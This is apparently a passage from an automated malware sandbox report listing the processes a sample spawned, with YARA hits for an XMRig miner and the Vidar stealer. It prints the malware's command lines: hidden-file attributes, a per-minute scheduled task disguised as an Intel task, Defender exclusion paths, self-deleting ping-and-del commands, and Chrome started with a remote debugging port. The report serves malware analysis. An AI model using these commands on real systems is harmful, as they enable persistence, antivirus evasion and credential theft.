                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                              Start time:21:14:28
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                              Start time:21:14:28
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                              Start time:21:14:28
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                              Start time:21:14:28
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                              Start time:21:14:28
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:attrib +H "in.exe"
                                                                                                                                                                                                                              Imagebase:0x7ff6fcb40000
                                                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                              Start time:21:14:28
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"in.exe"
                                                                                                                                                                                                                              Imagebase:0x7ff76df70000
                                                                                                                                                                                                                              File size:1'827'328 bytes
                                                                                                                                                                                                                              MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                              Imagebase:0x7ff6fcb40000
                                                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                              Imagebase:0x7ff6fcb40000
                                                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                              Start time:21:14:29
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                              Start time:21:14:30
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                                                                                              Imagebase:0x7ff6b02e0000
                                                                                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                              Start time:21:14:30
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"
                                                                                                                                                                                                                              Imagebase:0xff0000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                              Start time:21:14:30
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                              Start time:21:14:31
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                              Imagebase:0x7ff6e1c00000
                                                                                                                                                                                                                              File size:1'827'328 bytes
                                                                                                                                                                                                                              MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                              Start time:21:14:31
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:explorer.exe
                                                                                                                                                                                                                              Imagebase:0x7ff72b770000
                                                                                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000002.2597232510.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000002.2598240255.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000002.2597232510.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                              Start time:21:14:31
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                              Start time:21:14:31
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                              Start time:21:14:32
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                                                                                                                                                                              Imagebase:0x7ff6b02e0000
                                                                                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                              Start time:21:14:33
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                                                                                                                                                                                                                              Imagebase:0xff0000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                              Start time:21:14:33
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                              Start time:21:14:40
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe"
                                                                                                                                                                                                                              Imagebase:0x300000
                                                                                                                                                                                                                              File size:4'471'808 bytes
                                                                                                                                                                                                                              MD5 hash:6D3D9DB92D0303C635E5EE37927AF3D0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                              Start time:21:14:44
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:147'968 bytes
                                                                                                                                                                                                                              MD5 hash:CC36E2A5A3C64941A79C31CA320E9797
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe, Author: Joe Security
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                              Start time:21:14:44
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe"
                                                                                                                                                                                                                              Imagebase:0x220d3470000
                                                                                                                                                                                                                              File size:1'058'336 bytes
                                                                                                                                                                                                                              MD5 hash:971B0519B1C0461DB6700610E5E9CA8E
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                              Start time:21:14:45
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                              Start time:21:14:48
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:1'881'088 bytes
                                                                                                                                                                                                                              MD5 hash:8A1AE39FD06F240834EE7731E4470D2F
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                              • Detection: 38%, ReversingLabs
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                              Start time:21:14:57
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe"
                                                                                                                                                                                                                              Imagebase:0xbe0000
                                                                                                                                                                                                                              File size:1'831'936 bytes
                                                                                                                                                                                                                              MD5 hash:C20D4E11E1046A5665D427BB4F6DE39E
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                              Start time:21:15:01
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                              Imagebase:0x7ff6e1c00000
                                                                                                                                                                                                                              File size:1'827'328 bytes
                                                                                                                                                                                                                              MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                              Start time:21:15:01
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:explorer.exe
                                                                                                                                                                                                                              Imagebase:0x7ff72b770000
                                                                                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000033.00000002.2996017964.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000033.00000002.2933758160.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000033.00000002.2933758160.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                              Start time:21:15:02
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                              Start time:21:15:03
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2276,i,12319100627993208386,7193125325130927108,262144 /prefetch:8
                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:54
